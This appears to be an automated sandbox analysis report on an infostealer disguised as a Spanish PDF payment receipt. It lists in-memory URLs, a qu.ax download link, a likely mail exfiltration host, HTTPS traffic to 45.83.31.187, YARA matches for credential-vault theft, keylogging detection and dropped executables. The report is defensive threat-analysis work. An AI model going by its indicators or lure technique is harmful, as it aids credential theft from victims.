                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000636C000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2342786428.0000000006790000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3256972001.00000000065D5000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3206793882.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.0000000003100000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006252000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3246417597.00000000068C2000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000030F6000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.wassadadvogados.com.br
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000635A000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000636C000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2342786428.0000000006790000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.0000000001646000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3256972001.00000000065D5000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3206793882.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.0000000003100000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006252000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006289000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3246417597.00000000068C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.000000000251B000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000263B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000030F6000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wassadadvogados.com.br
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000043C3000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2326420531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.00000000027E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.00000000030CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, repeat.exe.2.dr, Reramvw.exe.0.drString found in binary or memory: https://qu.ax/HCHP.pdf
                            Source: Reramvw.exe, 00000009.00000002.2328135287.000000000253F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax4e
                            Source: repeat.exe, 0000000B.00000002.2408937601.000000000265F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.axH
                            Source: repeat.exe, 00000007.00000002.2233090518.000000000293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.axen
                            Source: Reramvw.exe, 00000003.00000002.2152875189.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.axin
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3206577989.00000000010C3000.00000004.00000020.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000003093000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3214735733.0000000002EE6000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000002.00000002.3253942255.000000000636C000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2327172067.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2342786428.0000000006790000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 00000006.00000002.2331974047.0000000003326000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3256972001.00000000065D5000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3206793882.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 00000008.00000002.3213952954.0000000003100000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3248921386.0000000006252000.00000004.00000020.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 0000000A.00000002.3215330801.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003213000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3246417597.00000000068C2000.00000004.00000020.00020000.00000000.sdmp, repeat.exe, 0000000C.00000002.3213471421.0000000003066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                            Source: repeat.exe, 0000000B.00000002.2408937601.000000000271D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992695119.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1996305112.00000000067C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                            Source: JUSTIFICANTE DE PAGO CF.pdf.exe, 00000000.00000002.1992000502.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000003.00000002.2152875189.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 00000007.00000002.2233090518.0000000002955000.00000004.00000800.00020000.00000000.sdmp, Reramvw.exe, 00000009.00000002.2328135287.0000000002555000.00000004.00000800.00020000.00000000.sdmp, repeat.exe, 0000000B.00000002.2408937601.0000000002675000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iana.org/domains/example
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                            Source: unknownHTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49706 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49711 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49723 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49728 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.83.31.187:443 -> 192.168.2.5:49733 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Contains functionality to log keystrokes (.Net Source)
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, A1HZ.cs.Net Code: ymtWxyX

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 6.2.Reramvw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.31afa1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                            Source: 0.2.JUSTIFICANTE DE PAGO CF.pdf.exe.43d8c88.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                            Initial sample is a PE file and has a suspicious name
                            Source: initial sampleStatic PE information: Filename: JUSTIFICANTE DE PAGO CF.pdf.exe
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 0_2_015CCBD80_2_015CCBD8
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 0_2_015C3F780_2_015C3F78
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 0_2_015C3F880_2_015C3F88
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_02E0D2302_2_02E0D230
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_02E04AA82_2_02E04AA8
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_02E09EA82_2_02E09EA8
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_02E03E902_2_02E03E90
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_02E041D82_2_02E041D8
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_064100402_2_06410040
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_0641E2B82_2_0641E2B8
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_06410E202_2_06410E20
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_06410A582_2_06410A58
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_0641BB702_2_0641BB70
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_064297702_2_06429770
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_064242D02_2_064242D0
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_064232802_2_06423280
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_064253882_2_06425388
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_064200402_2_06420040
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_0642882B2_2_0642882B
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_0642D1D82_2_0642D1D8
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_0642A5382_2_0642A538
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_0642B1C02_2_0642B1C0
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeCode function: 2_2_064239D82_2_064239D8
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 3_2_02A0CBD83_2_02A0CBD8
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 3_2_02A03F883_2_02A03F88
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 3_2_02A03F783_2_02A03F78
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_018D41D86_2_018D41D8
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_018DD2206_2_018DD220
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_018D4AA86_2_018D4AA8
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_018D9E986_2_018D9E98
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_018D3E906_2_018D3E90
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_05FD0E206_2_05FD0E20
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_05FDBB706_2_05FDBB70
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_068997686_2_06899768
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_068942C86_2_068942C8
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_068932786_2_06893278
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_068953806_2_06895380
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_068988226_2_06898822
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_068900406_2_06890040
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_0689D1D06_2_0689D1D0
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_0689A5306_2_0689A530
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_0689B1B86_2_0689B1B8
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 6_2_068939D06_2_068939D0
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 7_2_00FACBD87_2_00FACBD8
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 7_2_00FA3F887_2_00FA3F88
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 7_2_00FA3F787_2_00FA3F78
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_02EB41D88_2_02EB41D8
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_02EB4AA88_2_02EB4AA8
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_02EB3E908_2_02EB3E90
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_02EB9D788_2_02EB9D78
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_02EBD4C08_2_02EBD4C0
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_05DC84B38_2_05DC84B3
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_05DCCE608_2_05DCCE60
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_05DC93F88_2_05DC93F8
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_05DC3F588_2_05DC3F58
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_05DCAE488_2_05DCAE48
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_05DCA1C08_2_05DCA1C0
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_05DC00408_2_05DC0040
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_05DC50108_2_05DC5010
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_05DC2B008_2_05DC2B00
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_05DC32588_2_05DC3258
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 8_2_02EBD4B28_2_02EBD4B2
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 9_2_0079CBD89_2_0079CBD8
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 9_2_00793F789_2_00793F78
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 9_2_00793F889_2_00793F88
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_02C9D22010_2_02C9D220
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_02C941D810_2_02C941D8
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_02C996E010_2_02C996E0
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_02C94AA810_2_02C94AA8
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_02C99E9810_2_02C99E98
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_02C93E9010_2_02C93E90
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_06310E2010_2_06310E20
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_06310A5810_2_06310A58
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_0631BB7010_2_0631BB70
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_0632976810_2_06329768
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_0632327810_2_06323278
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_063242C810_2_063242C8
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_0632538010_2_06325380
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_0632882B10_2_0632882B
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_0632004010_2_06320040
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_0632D1D010_2_0632D1D0
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_0632A53010_2_0632A530
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_0632B1B810_2_0632B1B8
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeCode function: 10_2_063239D010_2_063239D0
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 11_2_024ECBD811_2_024ECBD8
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 11_2_024E3F7811_2_024E3F78
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 11_2_024E3F8811_2_024E3F88
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_015AD10012_2_015AD100
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_015A4AA812_2_015A4AA8
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_015A9D7812_2_015A9D78
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_015A3E9012_2_015A3E90
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_015A41D812_2_015A41D8
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeCode function: 12_2_0657EDAC12_2_0657EDAC
